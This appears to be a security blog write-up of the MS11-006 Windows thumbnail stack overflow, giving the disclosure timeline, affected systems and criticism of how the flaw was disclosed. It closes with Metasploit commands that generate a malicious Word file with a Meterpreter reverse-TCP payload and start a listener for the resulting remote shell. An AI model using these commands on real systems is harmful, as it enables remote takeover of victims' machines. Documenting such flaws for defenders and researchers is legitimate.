MS11-006 : Windows Thumbnails CreateSizedDIBSECTION Stack Buffer Overflow

Timeline :

Vulnerability disclosed by Moti & Xu Hao on POC2010 the 2010-12-15
CVE registered the 2010-12-22
PoC provided by Metasploit team the 2011-01-04

    PoC provided by :

Moti & Xu Hao
Yaniv Miron aka Lament of ilhack
jduck

    Reference(s) :

CVE-2010-3970
MSA-2490606
MS11-006

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

    Tested on Windows XP SP3

    Description :

Microsoft is one more time victim of a uncoordinated disclosed vulnerability. Moti Joseph & Xu Hao, two security researchers, have reveal, the 15 December, during thePOC2010 conference, a new Microsoft Windows vulnerability. No attention on this vulnerability disclosure until  December 22 (CVE-2010-3970), despite conference schedule of POC2010 had clearly indicate that a new Microsoft Windows vulnerability would be revealed. Maybe this non attention is due that the conference was hold in South Korea ?

Again, shortly thereafter, the information on this vulnerability have circulated quickly in the world of computer security professionals, culminating today in a public PoC provided by the Metasploit team. The presentation, conducted by Moti Joseph & Xu Hao, during the POC2010 conference, is also available on Exploit-DB.
This vulnerability, that we can classified as critical, is fairly simple to exploit. When viewing the content of a directory containing a forged Word, or PowerPoint, document in “Thumbnails” mode, arbitrary code can be executed with the privileges of the local user. Exploitation of this vulnerability can also be done through SharePoint.

A few hours after the release of the Metasploit PoC, Microsoft issued an advisory, MSA-2490606, indicating  the vulnerable systems and providing mitigation solutions. Microsoft does not currently plan to provide an out of band patch to correct this vulnerability.

What is also interesting in the disclosure life cycle of this vulnerability is that the announcement of this conference was held September 13, 2010, and at that time the organizers were looking for people interested to present their work. The deadline for submission of paper (CFP) was announced for October 15, 2010. This would mean that this vulnerability had been known long before October 15, 2010. What is also to note is that Microsoft was a sponsor of this conference.

    Commands :

use exploit/windows/fileformat/ms11_006_crea­tesizeddibsection
set FILENAME msf.doc
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig